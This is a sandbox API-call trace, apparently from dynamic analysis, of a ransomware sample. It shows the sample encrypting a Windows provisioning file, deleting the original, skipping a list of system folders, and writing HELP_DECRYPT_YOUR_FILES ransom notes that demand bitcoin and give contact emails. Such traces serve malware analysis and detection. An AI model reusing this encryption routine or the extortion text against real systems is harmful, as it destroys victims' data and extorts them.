	[0171.585] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0171.586] ReadFile (in: hFile=0x39c, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x22f, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x189930*=0x22f, lpOverlapped=0x0) returned 1
	[0171.591] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.591] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcba18) returned 1
	[0171.593] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.593] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0171.594] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.594] CryptHashData (hHash=0xfb95f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0171.594] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.594] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb95f0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8f30) returned 1
	[0171.594] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.595] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x22f, dwBufLen=0x22f | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x230) returned 1
	[0171.595] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.595] RtlMoveMemory (in: Destination=0xfdc7d8, Source=0xfdc138, Length=0x22f | out: Destination=0xfdc7d8) 
	[0171.595] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.596] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc7d8*, pdwDataLen=0x1894dc*=0x22f, dwBufLen=0x230 | out: pbData=0xfdc7d8*, pdwDataLen=0x1894dc*=0x230) returned 1
	[0171.596] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.596] CryptDestroyKey (hKey=0xfb8f30) returned 1
	[0171.596] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.597] CryptDestroyHash (hHash=0xfb95f0) returned 1
	[0171.597] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.597] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0171.597] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.598] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.598] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.598] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0171.600] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0171.600] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0171.601] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc7d8*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc7d8*, lpNumberOfBytesWritten=0x189938*=0x230, lpOverlapped=0x0) returned 1
	[0171.604] CloseHandle (hObject=0x3a0) returned 1
	[0171.606] CloseHandle (hObject=0x39c) returned 1
	[0171.606] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml")) returned 1
	[0171.609] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml")) returned 0
	[0171.609] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e60513, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e60513, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22f, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0171.610] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0171.611] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0171.611] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov"
	[0171.611] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*"
	[0171.612] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.612] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.612] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0171.612] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.613] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.613] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.616] CloseHandle (hObject=0x390) returned 1
	[0171.631] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.631] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.631] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0171.633] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.633] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.633] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.633] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.633] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0171.634] CloseHandle (hObject=0x390) returned 1
	[0171.635] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.636] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.636] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.636] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0171.636] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.642] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.642] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0171.645] CloseHandle (hObject=0x390) returned 1
	[0171.645] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.646] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.646] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.646] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0171.648] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.648] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0171.648] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.648] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.648] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0171.649] CloseHandle (hObject=0x390) returned 1
	[0171.649] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7fd16092, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fd623d4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0171.649] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*") returned 89
	[0171.649] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.652] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*") returned 0x59
	[0171.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.652] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0171.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.652] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0171.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.653] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0171.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.653] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.654] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0171.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.654] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0171.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.655] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.655] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0171.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.655] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0171.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.656] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0171.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.656] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0171.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.656] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0171.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.657] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.657] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.657] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0171.657] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.657] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0171.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.658] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0171.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.658] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0171.658] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.659] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0171.659] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.659] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0171.659] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.659] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.659] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7fd16092, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fd623d4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0171.659] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.659] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fd623d4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fd623d4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fd623d4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.660] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fd16092, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fd16092, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fd623d4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.660] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0171.660] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0171.660] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0171.660] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov"
	[0171.660] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\"
	[0171.660] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime"
